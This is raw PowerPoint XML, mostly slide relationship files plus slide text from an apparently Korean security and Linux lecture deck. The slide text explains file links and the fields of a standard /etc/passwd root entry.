<file path=ppt/slides/_rels/slide393.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574.bmp"/><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573.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image572.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image571.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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83.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image576.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image575.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide395.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579.bmp"/><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578.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image577.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image562.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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35.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slide" Target="slide383.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide398.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583.jpeg"/><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582.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image581.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image580.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide399.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587.bmp"/><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586.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image585.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image584.bmp"/></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 Target="slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.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slide" Target="slide431.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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slide" Target="slide431.xml"/><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11.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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303.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06.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide303.xml"/><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40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03.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11.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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1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1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1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1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1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2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2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2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2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09.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42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431.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide427.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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide42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431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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3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24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide47.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide432.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33.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3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34.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8.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kocw.net/home/search/kemView.do?kemId=978503" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43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324.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58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hyperlink" Target="http://archive.ubuntu.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.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slide" Target="slide431.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/" TargetMode="External"/><Relationship Id="rId9"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slide" Target="slide159.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide185.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide228.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide136.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide244.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide49.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide223.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide103.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide164.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide83.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide216.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide233.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide56.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide207.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide185.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide164.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide49.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide136.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide103.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide83.xml"/><Relationship Id="rId9"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5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.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slide" Target="slide47.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5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103.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide52.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53.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54.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55.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slide" Target="slide78.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide69.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide71.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide76.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide66.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide80.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide47.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide68.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide70.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide61.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide65.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide74.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide60.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide79.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide73.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide64.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide59.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide63.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide67.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide72.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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6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31.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3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87.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide96.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide84.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide93.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide47.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide56.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide100.xml"/></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3.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85.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8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slide" Target="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slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide89.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31.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide90.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slide" Target="slide83.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><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slide" Target="slide431.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6.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide96.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97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><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slide" Target="slide83.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide98.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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide99.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide83.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide431.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide257.xml"/><Relationship Id="rId4"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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 구성</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Intro</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Plan</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Plan/Inforsec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Plan/Defcybsec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">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now</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>now</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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/Theory/T3/Link </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>링크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(link)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T3/Passwd </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>패스워드 구조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– passwd</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>root:x:0:0:root:/root:/bin/bash</a:t>
            </a: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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>root : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 계정 이름 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(ID)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="666666"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>x : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 비밀 번호 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(x : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>암호화된 형태로 저장  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>=&gt; /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>/shadow </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>에 저장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="666666"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>0 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>UID (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>리눅스의 모든 정보는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>수치값으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t> 저장 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>: root -&gt; 0 (UID))</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="666666"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>0 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 소속 그룹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>GID (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>리눅스의 모든 정보는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>수치값으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t> 저장 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>: root -&gt; 0 (GID))</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="666666"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
